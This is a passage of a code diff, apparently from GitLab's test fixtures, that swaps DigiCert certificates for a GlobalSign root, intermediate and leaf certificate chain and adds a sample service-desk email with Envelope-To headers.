-2sPIoc4sUqIAY+tzunHISScjl2SFnjgOrWNoPLpSgVh5oywM395t6zHyuqB8bPEs -1OG9d4Q3A84ytciagRpKkk47RpqF/oOi+Z6Mo8wNXrM9zwR4jxQUezKcxwCmXMS1 -oVWNWlZopCJwqjyBcdmdqEU79OX2olHdx3ti6G8MdOu42vi/hw15UJGQmxg7kVkn -8TUoE6smftX3eg== +MIIExTCCA62gAwIBAgIQeimFGrf0XWZ5UGZBtv/XHTANBgkqhkiG9w0BAQsFADBM +MSAwHgYDVQQLExdHbG9iYWxTaWduIFJvb3QgQ0EgLSBSMzETMBEGA1UEChMKR2xv +YmFsU2lnbjETMBEGA1UEAxMKR2xvYmFsU2lnbjAeFw0yMTA2MTYxMjAwMDBaFw0y +NDA2MTYwMDAwMDBaMFgxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9iYWxTaWdu +IG52LXNhMS4wLAYDVQQDEyVHbG9iYWxTaWduIEF0bGFzIFIzIERWIFRMUyBDQSBI +MiAyMDIxMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1JTAQMj+QUYF +3d9X5eOWFOphbB6GpHE3J0uvUXcQwxnd8Jz26aQCE1ZYxJFEc2WmsxuVeVXU+rZj +7+MYD7Mg72bhuiwUdwRGRN4a2N122LfIQlTFlHu/fwcNqYX/fe3phvZt9upnH4oJ +aLBbay+t+HPPC4em74x2WKaIl31ZXzgzllLomnlLISLOKiQe1rEHp4yy3/yE2a4G +1l/lprA49dcyM/oylm9Bbkum2F4C+EOjHgTAoDVJrJpdWvPj0CU+HkmftujfFp4S +55LECSr2TfJt7xjgR3eLUx12nlpoauWEzZ0/i6OIDPfbmqcksw4ani/YO07LbRM6 +cY9VZzkAvwIDAQABo4IBlTCCAZEwDgYDVR0PAQH/BAQDAgGGMB0GA1UdJQQWMBQG +CCsGAQUFBwMBBggrBgEFBQcDAjASBgNVHRMBAf8ECDAGAQH/AgEAMB0GA1UdDgQW +BBQqNLmq+r88iPFH8tISeL7F5aqwaTAfBgNVHSMEGDAWgBSP8Et/qC5FJK5NUPpj +move4t0bvDB7BggrBgEFBQcBAQRvMG0wLgYIKwYBBQUHMAGGImh0dHA6Ly9vY3Nw +Mi5nbG9iYWxzaWduLmNvbS9yb290cjMwOwYIKwYBBQUHMAKGL2h0dHA6Ly9zZWN1 +cmUuZ2xvYmFsc2lnbi5jb20vY2FjZXJ0L3Jvb3QtcjMuY3J0MDYGA1UdHwQvMC0w +K6ApoCeGJWh0dHA6Ly9jcmwuZ2xvYmFsc2lnbi5jb20vcm9vdC1yMy5jcmwwVwYD +VR0gBFAwTjAIBgZngQwBAgEwQgYKKwYBBAGgMgoBAzA0MDIGCCsGAQUFBwIBFiZo +dHRwczovL3d3dy5nbG9iYWxzaWduLmNvbS9yZXBvc2l0b3J5LzANBgkqhkiG9w0B +AQsFAAOCAQEAEsIwXEhdAfoUGaKAnYfVI7zsOY7Sx8bpC/obGxXa4Kyu8CVx+TtT +g8WmKNF7+I7C51NZEmhvb8UDI1G9ny7iYIRDajQD5AeZowbfC69aHQSI9LiOeAZb +YaRDJfWps9redPwoaC0iT5R4xLOnWwCtmIho1bv/YG3pMAvaQ+qn04kuUvWO7LEp +u7FdHmx1DdgkefcqYgN/rAZ8E39S9VxWV+64PNUDey8vkAIH8FCTxbWiITty6dsH +SulKQ9pSa93k9PHTf+di08mMQBq5WBWTiFeMYZEWyE/z7NHdU3eLMZjq6y/nKlF9 +nywrToh4AgdZK6JnbU+lqbNiexJbaBoA3w== -----END CERTIFICATE----- -----BEGIN CERTIFICATE----- 
-MIIDxTCCAq2gAwIBAgIQAqxcJmoLQJuPC3nyrkYldzANBgkqhkiG9w0BAQUFADBs -MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3 -d3cuZGlnaWNlcnQuY29tMSswKQYDVQQDEyJEaWdpQ2VydCBIaWdoIEFzc3VyYW5j -ZSBFViBSb290IENBMB4XDTA2MTExMDAwMDAwMFoXDTMxMTExMDAwMDAwMFowbDEL -MAkGA1UEBhMCVVMxFTATBgNVBAoTDERpZ2lDZXJ0IEluYzEZMBcGA1UECxMQd3d3 -LmRpZ2ljZXJ0LmNvbTErMCkGA1UEAxMiRGlnaUNlcnQgSGlnaCBBc3N1cmFuY2Ug -RVYgUm9vdCBDQTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMbM5XPm -+9S75S0tMqbf5YE/yc0lSbZxKsPVlDRnogocsF9ppkCxxLeyj9CYpKlBWTrT3JTW -PNt0OKRKzE0lgvdKpVMSOO7zSW1xkX5jtqumX8OkhPhPYlG++MXs2ziS4wblCJEM -xChBVfvLWokVfnHoNb9Ncgk9vjo4UFt3MRuNs8ckRZqnrG0AFFoEt7oT61EKmEFB -Ik5lYYeBQVCmeVyJ3hlKV9Uu5l0cUyx+mM0aBhakaHPQNAQTXKFx01p8VdteZOE3 -hzBWBOURtCmAEvF5OYiiAhF8J2a3iLd48soKqDirCmTCv2ZdlYTBoSUeh10aUAsg -EsxBu24LUTi4S8sCAwEAAaNjMGEwDgYDVR0PAQH/BAQDAgGGMA8GA1UdEwEB/wQF -MAMBAf8wHQYDVR0OBBYEFLE+w2kD+L9HAdSYJhoIAu9jZCvDMB8GA1UdIwQYMBaA -FLE+w2kD+L9HAdSYJhoIAu9jZCvDMA0GCSqGSIb3DQEBBQUAA4IBAQAcGgaX3Nec -nzyIZgYIVyHbIUf4KmeqvxgydkAQV8GK83rZEWWONfqe/EW1ntlMMUu4kehDLI6z -eM7b41N5cdblIZQB2lWHmiRk9opmzN6cN82oNLFpmyPInngiK3BD41VHMWEZ71jF -hS9OMPagMRYjyOfiZRYzy78aG6A9+MpeizGLYAiJLQwGXFK3xPkKmNEVX58Svnw2 -Yzi9RKR/5CYrCsSXaQ3pjOLAEFe4yHYSkVXySGnYvCoCWw9E1CAx2/S6cCZdkGCe -vEsXCS+0yx5DaMkHJ8HSXPfqIbloEpw8nL+e/IBcm2PN7EeqJSdnoDfzAIJ9VNep -+OkuE6N36B9K +MIIDXzCCAkegAwIBAgILBAAAAAABIVhTCKIwDQYJKoZIhvcNAQELBQAwTDEgMB4G +A1UECxMXR2xvYmFsU2lnbiBSb290IENBIC0gUjMxEzARBgNVBAoTCkdsb2JhbFNp +Z24xEzARBgNVBAMTCkdsb2JhbFNpZ24wHhcNMDkwMzE4MTAwMDAwWhcNMjkwMzE4 +MTAwMDAwWjBMMSAwHgYDVQQLExdHbG9iYWxTaWduIFJvb3QgQ0EgLSBSMzETMBEG +A1UEChMKR2xvYmFsU2lnbjETMBEGA1UEAxMKR2xvYmFsU2lnbjCCASIwDQYJKoZI +hvcNAQEBBQADggEPADCCAQoCggEBAMwldpB5BngiFvXAg7aEyiie/QV2EcWtiHL8 +RgJDx7KKnQRfJMsuS+FggkbhUqsMgUdwbN1k0ev1LKMPgj0MK66X17YUhhB5uzsT +gHeMCOFJ0mpiLx9e+pZo34knlTifBtc+ycsmWQ1z3rDI6SYOgxXG71uL0gRgykmm +KPZpO/bLyCiR5Z2KYVc3rHQU3HTgOu5yLy6c+9C7v/U9AOEGM+iCK65TpjoWc4zd +QQ4gOsC0p6Hpsk+QLjJg6VfLuQSSaGjlOCZgdbKfd/+RFO+uIEn8rUAVSNECMWEZ 
+XriX7613t2Saer9fwRPvm2L7DWzgVGkWqQPabumDk3F2xmmFghcCAwEAAaNCMEAw +DgYDVR0PAQH/BAQDAgEGMA8GA1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFI/wS3+o +LkUkrk1Q+mOai97i3Ru8MA0GCSqGSIb3DQEBCwUAA4IBAQBLQNvAUKr+yAzv95ZU +RUm7lgAJQayzE4aGKAczymvmdLm6AC2upArT9fHxD4q/c2dKg8dEe3jgr25sbwMp +jjM5RcOO5LlXbKr8EpbsU8Yt5CRsuZRj+9xTaGdWPoO4zzUhw8lo/s7awlOqzJCK +6fBdRoyV3XpYKBovHd7NADdBj+1EbddTKJd+82cEHhXXipa0095MJ6RMG3NzdvQX +mcIfeg7jLQitChws/zyrVQ4PkX4268NXSb7hLi18YIvDQVETI53O9zJrlAGomecs +Mx86OyXShkDOOyyGeMlhLxS67ttVb9+E7gUJTb0o2HLO02JQZR7rkpeDMdmztcpH +WD9f -----END CERTIFICATE----- diff --git a/spec/fixtures/clusters/intermediate_certificate.pem b/spec/fixtures/clusters/intermediate_certificate.pem index 8a81175b746..21bada73564 100644 --- a/spec/fixtures/clusters/intermediate_certificate.pem +++ b/spec/fixtures/clusters/intermediate_certificate.pem @@ -1,28 +1,28 @@ -----BEGIN CERTIFICATE----- -MIIEtjCCA56gAwIBAgIQDHmpRLCMEZUgkmFf4msdgzANBgkqhkiG9w0BAQsFADBs -MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3 -d3cuZGlnaWNlcnQuY29tMSswKQYDVQQDEyJEaWdpQ2VydCBIaWdoIEFzc3VyYW5j -ZSBFViBSb290IENBMB4XDTEzMTAyMjEyMDAwMFoXDTI4MTAyMjEyMDAwMFowdTEL -MAkGA1UEBhMCVVMxFTATBgNVBAoTDERpZ2lDZXJ0IEluYzEZMBcGA1UECxMQd3d3 -LmRpZ2ljZXJ0LmNvbTE0MDIGA1UEAxMrRGlnaUNlcnQgU0hBMiBFeHRlbmRlZCBW -YWxpZGF0aW9uIFNlcnZlciBDQTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoC -ggEBANdTpARR+JmmFkhLZyeqk0nQOe0MsLAAh/FnKIaFjI5j2ryxQDji0/XspQUY -uD0+xZkXMuwYjPrxDKZkIYXLBxA0sFKIKx9om9KxjxKws9LniB8f7zh3VFNfgHk/ -LhqqqB5LKw2rt2O5Nbd9FLxZS99RStKh4gzikIKHaq7q12TWmFXo/a8aUGxUvBHy -/Urynbt/DvTVvo4WiRJV2MBxNO723C3sxIclho3YIeSwTQyJ3DkmF93215SF2AQh -cJ1vb/9cuhnhRctWVyh+HA1BV6q3uCe7seT6Ku8hI3UarS2bhjWMnHe1c63YlC3k -8wyd7sFOYn4XwHGeLN7x+RAoGTMCAwEAAaOCAUkwggFFMBIGA1UdEwEB/wQIMAYB -Af8CAQAwDgYDVR0PAQH/BAQDAgGGMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggrBgEF -BQcDAjA0BggrBgEFBQcBAQQoMCYwJAYIKwYBBQUHMAGGGGh0dHA6Ly9vY3NwLmRp -Z2ljZXJ0LmNvbTBLBgNVHR8ERDBCMECgPqA8hjpodHRwOi8vY3JsNC5kaWdpY2Vy 
-dC5jb20vRGlnaUNlcnRIaWdoQXNzdXJhbmNlRVZSb290Q0EuY3JsMD0GA1UdIAQ2 -MDQwMgYEVR0gADAqMCgGCCsGAQUFBwIBFhxodHRwczovL3d3dy5kaWdpY2VydC5j -b20vQ1BTMB0GA1UdDgQWBBQ901Cl1qCt7vNKYApl0yHU+PjWDzAfBgNVHSMEGDAW -gBSxPsNpA/i/RwHUmCYaCALvY2QrwzANBgkqhkiG9w0BAQsFAAOCAQEAnbbQkIbh -hgLtxaDwNBx0wY12zIYKqPBKikLWP8ipTa18CK3mtlC4ohpNiAexKSHc59rGPCHg -4xFJcKx6HQGkyhE6V6t9VypAdP3THYUYUN9XR3WhfVUgLkc3UHKMf4Ib0mKPLQNa -2sPIoc4sUqIAY+tzunHISScjl2SFnjgOrWNoPLpSgVh5oywM395t6zHyuqB8bPEs -1OG9d4Q3A84ytciagRpKkk47RpqF/oOi+Z6Mo8wNXrM9zwR4jxQUezKcxwCmXMS1 -oVWNWlZopCJwqjyBcdmdqEU79OX2olHdx3ti6G8MdOu42vi/hw15UJGQmxg7kVkn -8TUoE6smftX3eg== +MIIExTCCA62gAwIBAgIQeimFGrf0XWZ5UGZBtv/XHTANBgkqhkiG9w0BAQsFADBM +MSAwHgYDVQQLExdHbG9iYWxTaWduIFJvb3QgQ0EgLSBSMzETMBEGA1UEChMKR2xv +YmFsU2lnbjETMBEGA1UEAxMKR2xvYmFsU2lnbjAeFw0yMTA2MTYxMjAwMDBaFw0y +NDA2MTYwMDAwMDBaMFgxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9iYWxTaWdu +IG52LXNhMS4wLAYDVQQDEyVHbG9iYWxTaWduIEF0bGFzIFIzIERWIFRMUyBDQSBI +MiAyMDIxMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1JTAQMj+QUYF +3d9X5eOWFOphbB6GpHE3J0uvUXcQwxnd8Jz26aQCE1ZYxJFEc2WmsxuVeVXU+rZj +7+MYD7Mg72bhuiwUdwRGRN4a2N122LfIQlTFlHu/fwcNqYX/fe3phvZt9upnH4oJ +aLBbay+t+HPPC4em74x2WKaIl31ZXzgzllLomnlLISLOKiQe1rEHp4yy3/yE2a4G +1l/lprA49dcyM/oylm9Bbkum2F4C+EOjHgTAoDVJrJpdWvPj0CU+HkmftujfFp4S +55LECSr2TfJt7xjgR3eLUx12nlpoauWEzZ0/i6OIDPfbmqcksw4ani/YO07LbRM6 +cY9VZzkAvwIDAQABo4IBlTCCAZEwDgYDVR0PAQH/BAQDAgGGMB0GA1UdJQQWMBQG +CCsGAQUFBwMBBggrBgEFBQcDAjASBgNVHRMBAf8ECDAGAQH/AgEAMB0GA1UdDgQW +BBQqNLmq+r88iPFH8tISeL7F5aqwaTAfBgNVHSMEGDAWgBSP8Et/qC5FJK5NUPpj +move4t0bvDB7BggrBgEFBQcBAQRvMG0wLgYIKwYBBQUHMAGGImh0dHA6Ly9vY3Nw +Mi5nbG9iYWxzaWduLmNvbS9yb290cjMwOwYIKwYBBQUHMAKGL2h0dHA6Ly9zZWN1 +cmUuZ2xvYmFsc2lnbi5jb20vY2FjZXJ0L3Jvb3QtcjMuY3J0MDYGA1UdHwQvMC0w +K6ApoCeGJWh0dHA6Ly9jcmwuZ2xvYmFsc2lnbi5jb20vcm9vdC1yMy5jcmwwVwYD +VR0gBFAwTjAIBgZngQwBAgEwQgYKKwYBBAGgMgoBAzA0MDIGCCsGAQUFBwIBFiZo +dHRwczovL3d3dy5nbG9iYWxzaWduLmNvbS9yZXBvc2l0b3J5LzANBgkqhkiG9w0B +AQsFAAOCAQEAEsIwXEhdAfoUGaKAnYfVI7zsOY7Sx8bpC/obGxXa4Kyu8CVx+TtT 
+g8WmKNF7+I7C51NZEmhvb8UDI1G9ny7iYIRDajQD5AeZowbfC69aHQSI9LiOeAZb +YaRDJfWps9redPwoaC0iT5R4xLOnWwCtmIho1bv/YG3pMAvaQ+qn04kuUvWO7LEp +u7FdHmx1DdgkefcqYgN/rAZ8E39S9VxWV+64PNUDey8vkAIH8FCTxbWiITty6dsH +SulKQ9pSa93k9PHTf+di08mMQBq5WBWTiFeMYZEWyE/z7NHdU3eLMZjq6y/nKlF9 +nywrToh4AgdZK6JnbU+lqbNiexJbaBoA3w== -----END CERTIFICATE----- diff --git a/spec/fixtures/clusters/leaf_certificate.pem b/spec/fixtures/clusters/leaf_certificate.pem new file mode 100644 index 00000000000..aecb3fc8d4b --- /dev/null +++ b/spec/fixtures/clusters/leaf_certificate.pem @@ -0,0 +1,37 @@ +-----BEGIN CERTIFICATE----- +MIIGYzCCBUugAwIBAgIQAaQHyOeT/PBR4ioLKYneZDANBgkqhkiG9w0BAQsFADBY +MQswCQYDVQQGEwJCRTEZMBcGA1UEChMQR2xvYmFsU2lnbiBudi1zYTEuMCwGA1UE +AxMlR2xvYmFsU2lnbiBBdGxhcyBSMyBEViBUTFMgQ0EgSDIgMjAyMTAeFw0yMTEw +MTgxODUwMDRaFw0yMjExMTkxODUwMDNaMBsxGTAXBgNVBAMMEGFib3V0LmdpdGxh +Yi5jb20wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDWSo0eziN/0lq5 +dIcS7ZceJw2odzZeT0tRkcKEW8iagNul6JetrFlk6h5lxoLEu35+MK6/fWHNmt7u +eQk7HS0uRipskAzeGrL1Hvk8EjIcHXXTxpRu7JqWOu7ZSXwNxW5cqn7L9/N2gYwt +Jg/sfkv9AFQiNOdKrarKfbcBstxmra6rQbh5ggLG5UBT23N4ZrA3XnzvEx3+GjtO +u/a5izbk7FQP3gyXKyfm/SQRpNsytYa9jJqu5Hmyzfap5KaueOJbtJEOk8dR/HWR +i/gmAUevq62MNxorYbz8YU/P1468tS7iORkD31Tc2QWCMQSPya5qGaCGnz7dVgWy +E1xTPbBXAgMBAAGjggNkMIIDYDAbBgNVHREEFDASghBhYm91dC5naXRsYWIuY29t +MA4GA1UdDwEB/wQEAwIFoDAdBgNVHSUEFjAUBggrBgEFBQcDAQYIKwYBBQUHAwIw +HQYDVR0OBBYEFJFVruwpjWeUfGJXl3m5grAjhAwPMFcGA1UdIARQME4wCAYGZ4EM +AQIBMEIGCisGAQQBoDIKAQMwNDAyBggrBgEFBQcCARYmaHR0cHM6Ly93d3cuZ2xv +YmFsc2lnbi5jb20vcmVwb3NpdG9yeS8wDAYDVR0TAQH/BAIwADCBngYIKwYBBQUH +AQEEgZEwgY4wQAYIKwYBBQUHMAGGNGh0dHA6Ly9vY3NwLmdsb2JhbHNpZ24uY29t +L2NhL2dzYXRsYXNyM2R2dGxzY2FoMjIwMjEwSgYIKwYBBQUHMAKGPmh0dHA6Ly9z +ZWN1cmUuZ2xvYmFsc2lnbi5jb20vY2FjZXJ0L2dzYXRsYXNyM2R2dGxzY2FoMjIw +MjEuY3J0MB8GA1UdIwQYMBaAFCo0uar6vzyI8Ufy0hJ4vsXlqrBpMEgGA1UdHwRB +MD8wPaA7oDmGN2h0dHA6Ly9jcmwuZ2xvYmFsc2lnbi5jb20vY2EvZ3NhdGxhc3Iz +ZHZ0bHNjYWgyMjAyMS5jcmwwggF+BgorBgEEAdZ5AgQCBIIBbgSCAWoBaAB3AG9T 
+dqwx8DEZ2JkApFEV/3cVHBHZAsEAKQaNsgiaN9kTAAABfJS9R5YAAAQDAEgwRgIh +AOOZmc41vB2ICwkwEB5Bmpm/X8UHfjbxwrCXEdeRmO+qAiEAg/JugZIrG2PeV4bA +Gm6rry7HUfB954bQJ4p0PeQVmwsAdABGpVXrdfqRIDC1oolp9PN9ESxBdL79SbiF +q/L8cP5tRwAAAXyUvUeOAAAEAwBFMEMCHyRAiTz2fZ8DuQF6hrVP+IMTCPBtjB3D +m4naI8tC/foCIDXFCRIYjRb00CFI6piLYGihRy+GYF5nMQhQ9uE6hltzAHcAUaOw +9f0BeZxWbbg3eI8MpHrMGyfL956IQpoN/tSLBeUAAAF8lL1ICgAABAMASDBGAiEA +5d/bXb9TPZWhwSH8GGji/LDFL6OJnZtOV94sBaDiFgMCIQCtl00oCRMFFnqsvBo6 +SRtnDqJkEHYBS12I4LyC+D1onjANBgkqhkiG9w0BAQsFAAOCAQEAE5xcno79J+Ec +DIPJKnJCugKiM7yKjCjCp/63osCbRC+jUwRyXBIe/oTdY3geKwDOQAvyEeJPSWP1 +LbNp0l3yHbYXfsYl/NMTrJpjrJrrRO5BxG/d3IPwXIlcZrrdDSoGfGYIF9N23iqB +in15L7B+PodTl8/mSQZTjbLoecPvl+AOcLyStcWCKYQUlQb3x4UV3R4Z1ukwGbBC +cDbTR2XOSJzA9ECJcxKnWjQRQUc54pdG3pt13Wu2dVapX5sWZpV05rga3bBDjCqw +DcfKuYbOChm2i6CQ578lAntPTIS02EkGFHrmYxrIAvlhGksHpJNJtRoff1KkQKni +r8emWp7D2Q== +-----END CERTIFICATE----- diff --git a/spec/fixtures/clusters/root_certificate.pem b/spec/fixtures/clusters/root_certificate.pem index 40107bd837d..8afb219058f 100644 --- a/spec/fixtures/clusters/root_certificate.pem +++ b/spec/fixtures/clusters/root_certificate.pem @@ -1,49 +1,21 @@ -----BEGIN CERTIFICATE----- -MIIItjCCB56gAwIBAgIQCu5Ga1hR41iahM0SWhyeNjANBgkqhkiG9w0BAQsFADB1 -MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3 -d3cuZGlnaWNlcnQuY29tMTQwMgYDVQQDEytEaWdpQ2VydCBTSEEyIEV4dGVuZGVk -IFZhbGlkYXRpb24gU2VydmVyIENBMB4XDTE5MTIwNDAwMDAwMFoXDTIxMTIwODEy -MDAwMFowgb0xHTAbBgNVBA8MFFByaXZhdGUgT3JnYW5pemF0aW9uMRMwEQYLKwYB -BAGCNzwCAQMTAlVTMRUwEwYLKwYBBAGCNzwCAQITBFV0YWgxFTATBgNVBAUTDDUy -OTk1MzctMDE0MjELMAkGA1UEBhMCVVMxDTALBgNVBAgTBFV0YWgxDTALBgNVBAcT -BExlaGkxFzAVBgNVBAoTDkRpZ2lDZXJ0LCBJbmMuMRUwEwYDVQQDEwxkaWdpY2Vy -dC5jb20wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDAeRYb/RLbljGZ -IB//DrEdyKYMQqqaJwBlrr3t2paAWNuDJizvVkTMIzdJesI1pA58Myenxp5Dp8GJ -u/VhBf//v/HAZHUE4xwu104Fg6A1BwUEKgVKERf+7kTt17Lf9fcMIjMyL+FeyPXb -DOFbH+ej/nYaneFLch2j2xWZg1+Thk0qBlGE8WWAK+fvbEuM0SOeH9RkYFCNGPRS 
-KsLn0GvaCnnD4LfNDyMqYop0IpaqXoREEnkRv1MVSOw+hBj497wnnO+/GZegfzwU -iS60h+PjlDfmdCP18qOS7tRd0qnfU3N3S+PYEd3R63LMcIfbgXNEEWBNKpiH9+8f -eXq6bXKPAgMBAAGjggT3MIIE8zAfBgNVHSMEGDAWgBQ901Cl1qCt7vNKYApl0yHU -+PjWDzAdBgNVHQ4EFgQUTx0XO7HqD5DOhwlm2p+70uYPBmgwggGjBgNVHREEggGa -MIIBloIMZGlnaWNlcnQuY29tggl0aGF3dGUuZGWCC2ZyZWVzc2wuY29tggxyYXBp -ZHNzbC5jb22CDGdlb3RydXN0LmNvbYIJdGhhd3RlLmZyggp0aGF3dGUuY29tghB3 -d3cucmFwaWRzc2wuY29tghB3d3cuZ2VvdHJ1c3QuY29tgg13d3cudGhhd3RlLmZy -gg13d3cudGhhd3RlLmRlgg53d3cudGhhd3RlLmNvbYIQd3d3LmRpZ2ljZXJ0LmNv -bYIYa2ItaW50ZXJuYWwuZGlnaWNlcnQuY29tghprbm93bGVkZ2ViYXNlLmRpZ2lj -ZXJ0LmNvbYIWa25vd2xlZGdlLmRpZ2ljZXJ0LmNvbYIPa2guZGlnaWNlcnQuY29t -ghlrbm93bGVkZ2VodWIuZGlnaWNlcnQuY29tghh3ZWJzZWN1cml0eS5kaWdpY2Vy -dC5jb22CFGNvbnRlbnQuZGlnaWNlcnQuY29tgg93d3cuZnJlZXNzbC5jb22CHHd3 -dy53ZWJzZWN1cml0eS5kaWdpY2VydC5jb20wDgYDVR0PAQH/BAQDAgWgMB0GA1Ud -JQQWMBQGCCsGAQUFBwMBBggrBgEFBQcDAjB1BgNVHR8EbjBsMDSgMqAwhi5odHRw -Oi8vY3JsMy5kaWdpY2VydC5jb20vc2hhMi1ldi1zZXJ2ZXItZzIuY3JsMDSgMqAw -hi5odHRwOi8vY3JsNC5kaWdpY2VydC5jb20vc2hhMi1ldi1zZXJ2ZXItZzIuY3Js -MEsGA1UdIAREMEIwNwYJYIZIAYb9bAIBMCowKAYIKwYBBQUHAgEWHGh0dHBzOi8v -d3d3LmRpZ2ljZXJ0LmNvbS9DUFMwBwYFZ4EMAQEwgYgGCCsGAQUFBwEBBHwwejAk -BggrBgEFBQcwAYYYaHR0cDovL29jc3AuZGlnaWNlcnQuY29tMFIGCCsGAQUFBzAC -hkZodHRwOi8vY2FjZXJ0cy5kaWdpY2VydC5jb20vRGlnaUNlcnRTSEEyRXh0ZW5k -ZWRWYWxpZGF0aW9uU2VydmVyQ0EuY3J0MAwGA1UdEwEB/wQCMAAwggF8BgorBgEE -AdZ5AgQCBIIBbASCAWgBZgB1AKS5CZC0GFgUh7sTosxncAo8NZgE+RvfuON3zQ7I -DdwQAAABbtLkOs4AAAQDAEYwRAIgQ7gh393PInhYfPOhg/lF9yZNRdvjBeufFoG8 -VnBuPNMCIBP8YGC83ig5ttw3ipSRjH0bKj4Ak5O4rynoql9Dy8x3AHYAVhQGmi/X -wuzT9eG9RLI+x0Z2ubyZEVzA75SYVdaJ0N0AAAFu0uQ7VgAABAMARzBFAiEAhzE7 -1c48wn3s/30IB4WgxfpLburH0Ku8cchv8QeqcgACIBrWpUlDD18AOfkPCOcB2kWU -vRXsdptVm3jPeU5TtDSoAHUAu9nfvB+KcbWTlCOXqpJ7RzhXlQqrUugakJZkNo4e -0YUAAAFu0uQ60gAABAMARjBEAiBBpH5m7ntGKFTOFgSLcFXRDg66xJqerMy0gOHj -4TIBYAIgfFABPNy6P61hjiOWwjq73lvoEdAyh18GeFHIp0BgsWEwDQYJKoZIhvcN -AQELBQADggEBAInaSEqteyQA1zUKiXVqgffhHKZsUq9UnMows6X+UoFPoby9xqm6 
-IaY/77zaFZYwXJlP/SvrlbgTLHAdir3y38uhAlfPX4iRuwggOpFFF5hqDckzCm91 -ocGnoG6sUY5mOqKu2vIcZkUQDe+K5gOxI6ME/4YwzWCIcTmBPQ6NQmqiFLPoQty1 -gdbGCcLQNFCuNq4n5OK2NmBjcbtyT4gglat7C4+KV8RkEubZ+MkXzyDkpEXjjzsK -7iuNB0hRgyyhGzHrlZ/l0OLoT0Cb4I5PzzRSseFEyPKCC1WSF7aE9rFfUqhpqSAT -7NV7SEijYyFFtuZfz9RGglcqnRlAfgTy+tU= +MIIDXzCCAkegAwIBAgILBAAAAAABIVhTCKIwDQYJKoZIhvcNAQELBQAwTDEgMB4G +A1UECxMXR2xvYmFsU2lnbiBSb290IENBIC0gUjMxEzARBgNVBAoTCkdsb2JhbFNp +Z24xEzARBgNVBAMTCkdsb2JhbFNpZ24wHhcNMDkwMzE4MTAwMDAwWhcNMjkwMzE4 +MTAwMDAwWjBMMSAwHgYDVQQLExdHbG9iYWxTaWduIFJvb3QgQ0EgLSBSMzETMBEG +A1UEChMKR2xvYmFsU2lnbjETMBEGA1UEAxMKR2xvYmFsU2lnbjCCASIwDQYJKoZI +hvcNAQEBBQADggEPADCCAQoCggEBAMwldpB5BngiFvXAg7aEyiie/QV2EcWtiHL8 +RgJDx7KKnQRfJMsuS+FggkbhUqsMgUdwbN1k0ev1LKMPgj0MK66X17YUhhB5uzsT +gHeMCOFJ0mpiLx9e+pZo34knlTifBtc+ycsmWQ1z3rDI6SYOgxXG71uL0gRgykmm +KPZpO/bLyCiR5Z2KYVc3rHQU3HTgOu5yLy6c+9C7v/U9AOEGM+iCK65TpjoWc4zd +QQ4gOsC0p6Hpsk+QLjJg6VfLuQSSaGjlOCZgdbKfd/+RFO+uIEn8rUAVSNECMWEZ +XriX7613t2Saer9fwRPvm2L7DWzgVGkWqQPabumDk3F2xmmFghcCAwEAAaNCMEAw +DgYDVR0PAQH/BAQDAgEGMA8GA1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFI/wS3+o +LkUkrk1Q+mOai97i3Ru8MA0GCSqGSIb3DQEBCwUAA4IBAQBLQNvAUKr+yAzv95ZU +RUm7lgAJQayzE4aGKAczymvmdLm6AC2upArT9fHxD4q/c2dKg8dEe3jgr25sbwMp +jjM5RcOO5LlXbKr8EpbsU8Yt5CRsuZRj+9xTaGdWPoO4zzUhw8lo/s7awlOqzJCK +6fBdRoyV3XpYKBovHd7NADdBj+1EbddTKJd+82cEHhXXipa0095MJ6RMG3NzdvQX +mcIfeg7jLQitChws/zyrVQ4PkX4268NXSb7hLi18YIvDQVETI53O9zJrlAGomecs +Mx86OyXShkDOOyyGeMlhLxS67ttVb9+E7gUJTb0o2HLO02JQZR7rkpeDMdmztcpH +WD9f -----END CERTIFICATE----- diff --git a/spec/fixtures/emails/service_desk_custom_address_envelope_to.eml b/spec/fixtures/emails/service_desk_custom_address_envelope_to.eml new file mode 100644 index 00000000000..ae8f3598a13 --- /dev/null +++ b/spec/fixtures/emails/service_desk_custom_address_envelope_to.eml @@ -0,0 +1,24 @@ +Envelope-To: support+project_slug-project_key@example.com +Return-Path: <alan@adventuretime.ooo> +Received: from iceking.adventuretime.ooo ([unix socket]) by iceking (Cyrus 
v2.2.13-Debian-2.2.13-19+squeeze3) with LMTPA; Thu, 13 Jun 2013 17:03:50 -0400 +Received: from mail-ie0-x234.google.com (mail-ie0-x234.google.com [IPv6:2607:f8b0:4001:c03::234]) by iceking.adventuretime.ooo (8.14.3/8.14.3/Debian-9.4) with ESMTP id r5DL3nFJ016967 (version=TLSv1/SSLv3 cipher=RC4-SHA bits=128 verify=NOT) for <incoming+gitlabhq/gitlabhq@appmail.adventuretime.ooo>; Thu, 13 Jun 2013 17:03:50 -0400 +Received: by mail-ie0-f180.google.com with SMTP id f4so21977375iea.25 for <incoming+email-test-project_id-issue-@appmail.adventuretime.ooo>; Thu, 13 Jun 2013 14:03:48 -0700 +Received: by 10.0.0.1 with HTTP; Thu, 13 Jun 2013 14:03:48 -0700 +Date: Thu, 13 Jun 2013 17:03:48 -0400 +From: Jake the Dog <alan@adventuretime.ooo> +To: support@example.com +Message-ID: <CAH_Wr+rNGAGGbV2iE5p918UVy4UyJqVcXRO2=otppgzduJSg@mail.gmail.com> +In-Reply-To: <CADkmRc+rNGAGGbV2iE5p918UVy4UyJqVcXRO2=otppgzduJSg@mail.gmail.com> +Subject: The message subject! @all +Mime-Version: 1.0 +Content-Type: text/plain; + charset=ISO-8859-1 +Content-Transfer-Encoding: 7bit +X-Sieve: CMU Sieve 